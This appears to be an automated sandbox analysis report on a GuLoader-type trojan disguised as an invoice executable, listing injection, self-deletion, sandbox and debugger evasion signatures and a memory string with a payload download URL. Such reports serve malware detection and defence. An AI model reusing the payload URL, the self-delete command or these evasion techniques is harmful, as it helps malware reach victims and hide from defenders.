Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D987C2 NtAllocateVirtualMemory, 11_2_02D987C2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9870A NtClose, 11_2_02D9870A
Abnormal high CPU Usage
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: draft_inv dec21.exe, 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000001.00000002.6382057961.0000000002C40000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameprajesselv.exeFE2XCx Frak vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000000.6373811116.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6919082626.00000000000DC000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000003.6915123008.00000000008F9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6934097497.000000001EB50000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs draft_inv dec21.exe
Source: draft_inv dec21.exe Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe
PE file contains strange resources
Source: draft_inv dec21.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zbcdidj04hd0ibmx.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edgegdi.dll Jump to behavior
Source: draft_inv dec21.exe Virustotal: Detection: 26%
Source: draft_inv dec21.exe Metadefender: Detection: 20%
Source: draft_inv dec21.exe ReversingLabs: Detection: 17%
Source: draft_inv dec21.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\draft_inv dec21.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: unknown Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe" Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe File created: C:\Users\user\AppData\Local\Temp\~DF3F74DA73951D2623.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@68/20
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: wntdll.pdbUGP source: draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: draft_inv dec21.exe, draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source: Binary string: svchost.pdb source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: svchost.pdbUGP source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.6378969703.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0040846A push ds; retf 1_2_00408472
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00407608 push ebx; iretd 1_2_00407609
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00405C16 push ss; iretd 1_2_00405BC7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_004094E5 push esi; iretd 1_2_004094E7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00405B7D push ss; iretd 1_2_00405BC7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00407F07 push ebp; retf 1_2_00407F0F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_00408119 push ebx; iretd 1_2_0040811B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242084B push ss; retf 1_2_02420852
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02425A48 push edi; ret 1_2_02425A89
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02425A84 push edi; ret 1_2_02425A89
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02422B3A push cs; iretd 1_2_02422B3F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02420BC1 push FFB8EB81h; ret 1_2_02420BC6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242399C push esp; ret 1_2_024239EF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B08CD push ecx; mov dword ptr [esp], ecx 8_2_1E8B08D6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8897A1 push es; iretd 8_2_1E8897A8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8821AD pushad ; retf 0004h 8_2_1E88223F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B021AD pushad ; retf 0004h 11_2_03B0223F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B097A1 push es; iretd 11_2_03B097A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B308CD push ecx; mov dword ptr [esp], ecx 11_2_03B308D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D95640 push 6F0B6D34h; retf 11_2_02D95645
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9B7D5 push eax; ret 11_2_02D9B828
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9A7A6 push es; ret 11_2_02D9A757
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D95B58 push edx; iretd 11_2_02D95B64
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D95B77 push 6371F8CDh; retf 11_2_02D95B7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9B88C push eax; ret 11_2_02D9B892
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9B82B push eax; ret 11_2_02D9B892
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9B822 push eax; ret 11_2_02D9B828
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D94E9C push 0D2B169Ah; retf 11_2_02D94EBD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9CCF6 push dword ptr [A92E284Ah]; ret 11_2_02D9CD17

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\svchost.exe Process created: /c del "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: /c del "C:\Users\user\Desktop\draft_inv dec21.exe" Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\draft_inv dec21.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://STATUSWAR.INFO/GHDFR/BIN_ROLFDOAA61.BIN
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5836 Thread sleep time: -265000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2524 Thread sleep count: 111 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2524 Thread sleep time: -222000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_024308D3 rdtsc 1_2_024308D3
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\draft_inv dec21.exe API coverage: 1.1 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 2.1 %
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe System information queried: ModuleInformation Jump to behavior
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 0000000A.00000000.6845627993.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6746869625.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6797467749.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078654239.00000000099AD000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW(( H
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWH
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: draft_inv dec21.exe, 00000008.00000003.6915277582.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726846989.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725996771.0000000000886000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920648507.0000000000886000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766142361.0000000010AD9000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097429161.0000000010AD9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.6865990791.0000000011420000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6768580400.0000000011420000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6817962178.0000000011420000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW q
Source: draft_inv dec21.exe, 00000001.00000002.6381987825.0000000002450000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921676377.0000000002400000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: draft_inv dec21.exe, 00000001.00000002.6383077978.0000000003279000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: draft_inv dec21.exe, 00000008.00000002.6921946470.0000000002599000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\draft_inv dec21.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_024308D3 rdtsc 1_2_024308D3
Enables debug privileges
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242FFE4 mov eax, dword ptr fs:[00000030h] 1_2_0242FFE4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02431671 mov eax, dword ptr fs:[00000030h] 1_2_02431671
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242F610 mov eax, dword ptr fs:[00000030h] 1_2_0242F610
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242C50C mov eax, dword ptr fs:[00000030h] 1_2_0242C50C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAE89 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAE89
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAE89 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAE89
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DBE80 mov eax, dword ptr fs:[00000030h] 8_2_1E8DBE80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECEA0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECEA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2EB8 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2EB8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2EB8 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2EB8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E970EAD mov eax, dword ptr fs:[00000030h] 8_2_1E970EAD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E970EAD mov eax, dword ptr fs:[00000030h] 8_2_1E970EAD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h] 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E979ED2 mov eax, dword ptr fs:[00000030h] 8_2_1E979ED2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F1ED8 mov eax, dword ptr fs:[00000030h] 8_2_1E8F1ED8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984EC1 mov eax, dword ptr fs:[00000030h] 8_2_1E984EC1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBED0 mov eax, dword ptr fs:[00000030h] 8_2_1E8EBED0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h] 8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h] 8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E1EED mov eax, dword ptr fs:[00000030h] 8_2_1E8E1EED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3EE2 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3EE2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E953EFC mov eax, dword ptr fs:[00000030h] 8_2_1E953EFC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EEE7 mov eax, dword ptr fs:[00000030h] 8_2_1E96EEE7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACEF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3E01 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3E01
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6E00 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h] 8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h] 8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h] 8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FE1F mov eax, dword ptr fs:[00000030h] 8_2_1E92FE1F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABE18 mov ecx, dword ptr fs:[00000030h] 8_2_1E8ABE18
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E8E15 mov eax, dword ptr fs:[00000030h] 8_2_1E8E8E15
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984E03 mov eax, dword ptr fs:[00000030h] 8_2_1E984E03
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3E14 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3E14
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E946E30 mov eax, dword ptr fs:[00000030h] 8_2_1E946E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E946E30 mov eax, dword ptr fs:[00000030h] 8_2_1E946E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
